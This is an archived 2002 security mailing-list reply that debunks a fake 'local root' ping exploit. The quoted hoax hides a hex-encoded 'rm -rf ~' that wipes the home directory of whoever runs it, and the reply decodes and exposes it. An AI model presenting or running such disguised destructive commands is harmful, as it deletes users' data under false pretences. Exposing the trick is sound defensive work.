lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <5.1.0.14.2.20020915065349.046ee090@bivens.parrhesia.com>
From: gbroiles at parrhesia.com (Greg Broiles)
Subject: ATTENTION   Local Root   ATTENTION

At 06:40 AM 9/15/2002 -0700, drdre@...h.com wrote:

>DrDre researchers have rcently discovered a bug in the ping program which 
>is installed setuid-root in nearly all unix and unix like systems. The bug 
>is not remotely exploitable.
>
>Tested on FreeBSD 4.4:
>
>bash# id
>uid=1006(drdre) gid=1006(researchers) groups=1006(researchers), 1009(labstaff)
>
>bash# ping `perl -e 'print 
>"\x6d\x65\x5f\x67\x75\x6e\x5f\x69\x73\x5f\x63\x6c\x69\x63\x6b"x1024'`;`echo 
>  -e "\x72\x6d\x20\x2d\x72\x66\x20\x7e"`
>Unknown erver error   ^

Ahh, bullshit.

echo -e "\x72\x6d\x20\x2d\x72\x66\x20\x7e" decodes to "rm -rf ~".

The bug you illustrate is related to people who run obscured code from 
untrusted sources without
inspecting it first.


--
Greg Broiles -- gbroiles@...rhesia.com -- PGP 0x26E4488c or 0x94245961

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ